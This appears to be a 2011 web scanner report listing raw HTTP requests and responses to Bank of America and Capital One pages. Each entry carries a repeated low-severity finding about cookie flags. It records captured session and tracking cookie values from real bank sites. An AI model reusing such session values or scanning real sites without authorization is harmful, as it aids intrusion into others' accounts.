GET /help/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:14 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-cards/cardoverview.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:02 GMT Content-length: 0 Content-type: text/html Set-Cookie: SMIDENTITY=OCd1eUfyEcTBcdzRmikiUYt9Hcisc1Gh1u9btfXo6jk2iYwtjhebVw1nhgFF6KlmpRdXfWP6oAE1ISBtgIxM3LdoctvAzX27T3D45PQOpMJUeowFgmjuCz+RpSn04+9WLMmF4p/3qP0PVzBHFGFRkzwE5OaT/L0iv4fa0f523oTajKE7dlB/qRvRq16VC3uwSY8nOHjQWKuYZVD9y/EOzzuIC2pbtUE0yVubP+/mxg6D0sevE7x0PoB27bkshtOSL/Y89tKz1feb+T0FxZmgtayMUMoPsHrOu12vLkQLE2hAqZxHc87W+lL+ksrLFRBrg4mECaTf+Y2rhBFThgksB7a7YrXy+P+M1KZi7PFBOBkLBEHb3SHeMWenl/tgGDcsiPv5/+zELJAWZV22EzuihOycvz+1s2wi3UZYCS29J/mO6EQk8LZM1BJ2vaI7/Ay00YstlYJeyAGWhaR17eKkiv9oj3iMJJS7V2AOTwlg0pwItcgPIQ2pQAGe75FFiHk7; path=/; domain=.bankofamerica.com; secure Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards Content-language: en-US Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/overview.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myexpression_banking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1p8qNJWYfWB5ZkwnxDLZnjSHsp1RWFYccXhcpFpZ4PHTpW00Lg88!1025162061; path=/ Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 55757
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Explore the history and culture of one of America's ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/auto-loan-calculator.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:26 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 33970
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Auto Payment and Other Auto Calculators - Capital One</title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/lp/auto-loans-pict.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 12533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Save time and m ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/refinance/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24471
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bank/commercial/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:20 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 41880
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Comme ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C8_01_T_HLMAINFOCCB HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:22 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 17136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Home ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /capitaloneplace/disclosures.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:43 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:43 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22852
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Im ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 35950
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:02 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:01 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contactus/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:28 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 28007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Capital O ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
